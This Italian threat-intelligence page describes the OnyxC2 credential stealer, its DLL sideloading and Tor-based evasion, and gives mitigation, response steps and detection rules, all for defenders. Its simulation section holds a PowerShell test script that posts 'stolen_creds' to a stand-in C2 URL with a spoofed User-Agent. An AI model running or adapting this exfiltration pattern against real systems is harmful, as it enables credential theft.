OnyxC2: Un nuovo Stealer che mira a 210 applicazioni
Detection stack
- AIDR
- Alert
- ETL
- Query
Riassunto
OnyxC2 è un nuovo malware-as-a-service stealer progettato per colpire credenziali, estensioni di autenticazione a due fattori e portafogli di criptovalute in circa 210 applicazioni. La piattaforma offre un toolkit completo in stile commerciale, inclusi un pannello di gestione, un builder e funzionalità di accesso remoto. Si basa anche su metodi di evasione avanzati, tra cui il sideloading di DLL con binari firmati di grandi dimensioni e componenti di payload crittografati.
Indagine
I ricercatori di BlackFog hanno esaminato più campioni di OnyxC2 e hanno scoperto un metodo di sideloading di DLL che sfrutta un eseguibile host firmato insieme a una DLL dannosa di oltre 120 MB mascherata come una libreria grafica NVIDIA. L’analisi della rete ha mostrato il malware comunicare tramite HTTPS con un endpoint API di backend specifico. I ricercatori hanno anche trovato overlay crittografati incorporati nella DLL, aiutando il malware a evitare un’analisi statica diretta.
Mitigazione
Implementare controlli di anti-esfiltrazione dei dati al punto finale può aiutare a bloccare il traffico in uscita non autorizzato indipendentemente dal processo utilizzato. I team di sicurezza dovrebbero monitorare i caricamenti sospetti di DLL associati a binari firmati e indagare su file insolitamente grandi che compaiono nei percorsi scrivibili dagli utenti. Sono anche raccomandate politiche di controllo applicativo rigorose e il monitoraggio di attività programmate non autorizzate.
Risposta
Se viene rilevata attività di OnyxC2, isolare immediatamente il sistema colpito per fermare ulteriori furti di dati. Catturare un dump completo della memoria per recuperare il payload decrittografato e verificare la presenza di sessioni HVNC attive o attività proxy SOCKS5. Rivedere tutte le attività programmate create di recente e ispezionare gli archivi delle credenziali del browser per evidenze di compromissione.
Flusso di attacco
Rilevamenti
Comando e Controllo Sospetto tramite Richiesta DNS da Dominio Top Level (TLD) Insolito (via DNS)
Visualizza
IOC (HashSha256) per rilevare: All’interno di OnyxC2: Il Nuovo Stealer che Colpisce 210 App
Visualizza
IOC (SourceIP) per rilevare: All’interno di OnyxC2: Il Nuovo Stealer che Colpisce 210 App
Visualizza
IOC (DestinationIP) per rilevare: All’interno di OnyxC2: Il Nuovo Stealer che Colpisce 210 App
Visualizza
Rilevamento della Comunicazione C2 di OnyxC2 Stealer e Anonimizzazione TOR [Proxy]
Visualizza
Rilevamento di Autorun di Attività Programmata e Attività Keylogger di OnyxC2 [Creazione Processi Windows]
Visualizza
Esecuzione della Simulazione
Prerequisito: Il Controllo Pre-volo di Telemetria e Baseline deve essere superato.
Motivo: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e puntare a generare l’esatta telemetria prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a una diagnosi errata.
-
Narrativa di Attacco e Comandi: L’avversario cerca di esfiltrare credenziali del browser rubate. Per evitare il rilevamento da parte del monitoraggio della sicurezza di rete, distribuiscono un binario Tor portatile per creare un tunnel anonimizzato. Una volta stabilito il tunnel, il malware avvia una connessione al suo server di Comando e Controllo (C2). Per mimetizzarsi con il traffico web legittimo, il malware finge il suo User-Agent per apparire come “Cloudflare” e prende di mira un endpoint API specifico ospitato dietro un proxy Cloudflare. Questa sequenza è progettata per attivare la correlazione della regola di rilevamento
torargomenti da riga di comando e la specifica/backend/api/app.phpmodello URL. -
Script di Test di Regressione:
# Simulazione della Comunicazione OnyxC2 Stealer # 1. Simulare la presenza di Tor (Creando un file/processo fittizio) # In uno scenario reale, sarebbe il vero tor.exe $TorPath = "$env:TEMPtor.exe" "Contenuto Simulato del Binario Tor" | Out-File -FilePath $TorPath # Creare un evento di esecuzione processo per 'tor' attraverso la riga di comando Start-Process -FilePath "cmd.exe" -ArgumentList "/c echo running tor service" -WindowStyle Hidden # Per assicurarsi che la logica di rilevamento 'command_line|contains: tor' venga colpita, # eseguiamo un comando che include la stringa 'tor' cmd.exe /c "echo initializing tor proxy..." # 2. Simulare la Connessione di Rete C2 # Usiamo PowerShell per simulare una connessione di rete con l'URL specifico e User-Agent $C2Url = "https://cloudflare-proxy-mock.com/backend/api/app.php" $UserAgent = "Cloudflare-Proxy-Agent/1.0" Write-Host "Attempting C2 communication to $C2Url" Invoke-WebRequest -Uri $C2Url -UserAgent $UserAgent -Method Post -Body "data=stolen_creds" -ErrorAction SilentlyContinue -
Comandi di Pulizia:
# Rimuovere gli artefatti simulati Remove-Item -Path "$env:TEMPtor.exe" -Force -ErrorAction SilentlyContinue Write-Host "Pulizia simulazione completata."